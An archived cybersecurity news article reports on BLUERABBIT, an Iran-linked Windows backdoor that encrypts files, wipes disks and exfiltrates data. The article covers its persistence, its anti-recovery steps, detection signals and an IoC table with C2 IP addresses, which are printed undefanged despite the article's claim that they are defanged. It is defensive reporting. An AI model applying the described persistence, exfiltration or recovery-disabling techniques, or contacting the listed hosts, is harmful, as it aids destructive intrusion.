CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership Jun 11, 2026

Hackers Use BLUERABBIT Backdoor to Encrypt Files and Wipe Disks Across Windows Systems

Cybersecurity News Archived Jun 11, 2026 ✓ Full text saved

A newly discovered backdoor called BLUERABBIT has been found targeting Windows systems with a dangerous mix of file encryption, disk wiping, and data theft. First observed in mid-to-late March 2026, the malware is believed to be the work of a threat actor with ties to Iran, and its primary targets appear to be organizations based […] The post Hackers Use BLUERABBIT Backdoor to Encrypt Files and Wipe Disks Across Windows Systems appeared first on Cyber Security News .

Full text archived locally
✦ AI Summary · Claude Sonnet


    HomeCyber Security News Hackers Use BLUERABBIT Backdoor to Encrypt Files and Wipe Disks Across Windows Systems By Tushar Subhra Dutta June 11, 2026 A newly discovered backdoor called BLUERABBIT has been found targeting Windows systems with a dangerous mix of file encryption, disk wiping, and data theft. First observed in mid-to-late March 2026, the malware is believed to be the work of a threat actor with ties to Iran, and its primary targets appear to be organizations based in Israel. The tool is written in the Go programming language and is built to blend into normal network activity, making it harder for defenders to detect. What makes BLUERABBIT especially alarming is how complete its toolkit is. It does not just lock files or steal data. It can do both at once, and when operators choose, it can permanently destroy every drive on a compromised machine. This is not a smash-and-grab operation. It is a carefully engineered platform designed to give attackers full, persistent control from the moment it lands on a system. Analysts at Binary Defense, who detailed their findings in a report shared with Cyber Security News (CSN), linked BLUERABBIT to the same Iran-nexus cluster responsible for two earlier tools, BLUEWIPE and SEWERGOO, which appeared in June 2025. The binary was internally named “Rabbit” and compiled as a developmental build, with symbols left intact, giving researchers unusual visibility into how the malware operates under the hood. BLUERABBIT disguises its command-and-control traffic to look like routine business messaging software. Rather than reaching out over standard web protocols, it routes operator instructions through RabbitMQ, a widely used enterprise messaging system. This design choice makes its network traffic appear legitimate, especially in environments where similar tools are already deployed as part of normal operations. PowerShell persistence command (Source – Binary Defense) The malware stores task results using Redis and sends stolen files to attacker-controlled cloud storage through MinIO, an open-source platform compatible with Amazon S3 storage. Together, these three channels give attackers a quiet, business-like infrastructure that many traditional security tools will not flag as suspicious activity. Hackers Use BLUERABBIT Backdoor Once BLUERABBIT runs, it checks a Windows registry key to see if it has executed before. If it is the first run, it creates a scheduled task called “OneDrive Update,” impersonating a real Microsoft service to stay hidden. This task restarts every 60 seconds and survives reboots, meaning simply closing the process will not remove it from a system. The malware gives operators several destructive choices. It can encrypt files across every drive on a system using a “.candy” extension and replace the desktop wallpaper with an AI-generated alert image. Two separate disk-wiping modules are also available: one overwrites drives with random data in a single pass, while the other layers zeros, random data, and 0xFF values across all drives, leaving no path to recovery. Raw commands (Source – Binary Defense) Before any destruction begins, BLUERABBIT takes ownership of critical Windows boot files and modifies the registry to disable automatic recovery and system repair. Once this sequence starts, Windows cannot reboot into a safe state or attempt any form of self-repair. Detection Opportunities and How Defenders Can Respond Defenders have several reliable signals to watch for. BLUERABBIT stages files in folders that look like Windows GUIDs but include letters beyond A through F. Real Windows GUIDs only use hexadecimal characters, so any folder containing characters like G through Z in that format is anomalous and worth investigating immediately. Unusual AMQP traffic from endpoint workstations is another strong warning sign, since this protocol is not typical for everyday devices. Security teams should also watch for the MinIO client being launched by unexpected parent processes, as this strongly suggests automated data exfiltration is already underway. Any process running takeown or icacls on core boot files outside a scheduled maintenance window should trigger an immediate alert. The data theft before encryption follows a double extortion model, meaning victims may have already lost sensitive information before they realize they have been targeted. Proactively hunting for early-stage indicators is the most effective defense posture teams can adopt right now. Indicators of Compromise (IoCs):- Type Indicator Description File Hash (SHA-256) 633d4cbd496b1094495da89a64f5e6c31a0f6… BLUERABBIT malware sample File Hash (SHA-256) 9706a192e2c1a1faaf0a521daf31c2af60ff4590… BLUERABBIT malware sample File Hash (SHA-256) ce9ad5f6c12019f4aae5b189bd8ddf5bb09e75… BLUERABBIT malware sample File Hash (SHA-256) f622ed85ef31ad4ab973f4e74524866fe1bb44f… BLUERABBIT malware sample IP Address 185.182.193.21 Attacker-controlled C2 infrastructure IP Address 212.8.248.104 Attacker-controlled C2 infrastructure JA3 806dab5164cf60d94026b88ab2d9851d TLS fingerprint associated with BLUERABBIT JA4 t13i131000_f57a46bbacb6_e5728521abd4 TLS fingerprint associated with BLUERABBIT JA3 d80125b9429e9d5f06ace959f00de8d0 TLS fingerprint associated with BLUERABBIT JA3S d75f9129bb5d05492a65ff78e081bcb2 TLS server fingerprint associated with BLUERABBIT JA4 t13i130900_f57a46bbacb6_e7c285222651 TLS fingerprint associated with BLUERABBIT Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News Microsoft 365 Service Degradation Bypassed Windows Driver Auto-Update Controls Windows Collaborative Translation Framework 0-Day Vulnerability Allows Privilege Escalation IronWorm Supply Chain Attack Uses Malicious npm Packages to Steal Developer Secrets Anthropic Released Claude Fable 5, the First Model in Mythos Class Hackers Use Fake Claude Code Install Page to Deliver Fileless .NET Infostealer Latest News Cyber Security News Cybercriminals Abuse Chinese-Language Guarantee Marketplaces to Trade Stolen Credentials Cyber Security News Ivanti Command Injection Vulnerability Exploited in Attacks Following PoC Release Cyber Security News PoC Exploit Released for Guest-to-Host Escape Linux Kernel Vulnerability Cyber Security News Oracle Emergency Security Update to Fix Critical RCE Vulnerability Cyber Security GreatXML BitLocker Bypass 0-Day Exploited Via Windows Defender Offline Scan
    💬 Team Notes
    Article Info
    Source
    Cybersecurity News
    Category
    ◇ Industry News & Leadership
    Published
    Jun 11, 2026
    Archived
    Jun 11, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗